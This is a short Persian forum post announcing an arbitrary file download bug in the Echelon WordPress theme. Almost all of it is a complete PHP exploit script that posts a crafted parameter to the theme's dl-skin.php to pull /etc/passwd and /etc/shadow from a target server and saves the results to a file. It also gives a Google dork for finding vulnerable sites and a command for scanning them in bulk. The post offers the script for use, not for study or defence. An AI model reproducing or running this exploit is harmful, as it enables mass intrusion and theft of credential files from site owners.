توییت
باگ موجود در یکی از تم های وردپرس به نام A.F.D WordPress Theme که می توان با استفاده از این باگ، فایل های دلخواه خود را از روی سرور مورد نظر دانلود کرد:
کد:
[php]*Name:*
Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:*
This exploit allows attacker to download any writable file from the server
*Usage info:*
Put the path of the file in the file's field of the exploit ,then click
"Download" button then you get the file directly
File download /etc/passwd & /etc/shadow
Failure consists of exploring a parameter $ _POST file
/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TIPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
# AUTOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#
------------------------------------------------------------------------------
# Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s
save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php
exploit.php www.alvo.com.br') : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php
www.alvo.com.br') : NULL;
$config['line'] =
"\n------------------------------------------------------------------------------------------------------------------\n";
$config['alvo'] = $alvo_[0][0];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
function __plus() {
ob_flush();
flush();
}
function __convertUrlQuery($query) {
$queryParts = explode('&', $query);
$params = array();
foreach ($queryParts as $param) {
$item = explode('=', $param);
$params[$item[0]] = urlencode($item[1]);
}
return $params;
}
function __request_info($curl, $config) {
$postDados =
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
foreach ($postDados as $campo => $valor) {
$postDados_format .= $campo . '=' . ($valor) . '&';
}
$postDados_format = rtrim($postDados_format, '&');
curl_setopt($curl, CURLOPT_POST, count($postDados));
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
. rand(1, 500) . '.31');
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$corpo = curl_exec($curl);
$server = curl_getinfo($curl);
$status = NULL;
preg_match_all('(HTTP.*)', $corpo, $status['http']);
preg_match_all('(Server:.*)', $corpo, $status['server']);
preg_match_all('(Content-Disposition:.*)', $corpo,
$status['Content-Disposition']);
$info = str_replace("\r", '', str_replace("\n", '',
"{$status['http'][0][0]}, {$status['server'][0][0]}
{$status['Content-Disposition'][0][0]}"));
curl_close($curl);
unset($curl);
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,
'info' => $info) : FALSE;
}
function main($config,$rest) {
__plus();
print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:
{$config['file']}:\n";
preg_match_all("(root:.*)", $rest['corpo'], $final);
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
$_final = array_merge($final[0], $final__[0], $final___[0],
$final____[0], $final_____[0]);
$res = NULL;
if (preg_match("#root#i", $rest['corpo'])) {
$res.= "0x " . date("h:m:s") . " [INFO][IS
VULN][RESUME][VALUES]:\n";
$res.=$config['line'] . "\n";
foreach ($_final as $value) {
$res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
}
$res.=$config['line'];
__plus();
file_put_contents('EXPLOIT_WPAFD_Echelon.txt',
"{$config['alvo']}\n{$res}\n", FILE_APPEND);
print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
} else {
print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
}
}
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -
BRASIL\n";
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();
[/php]
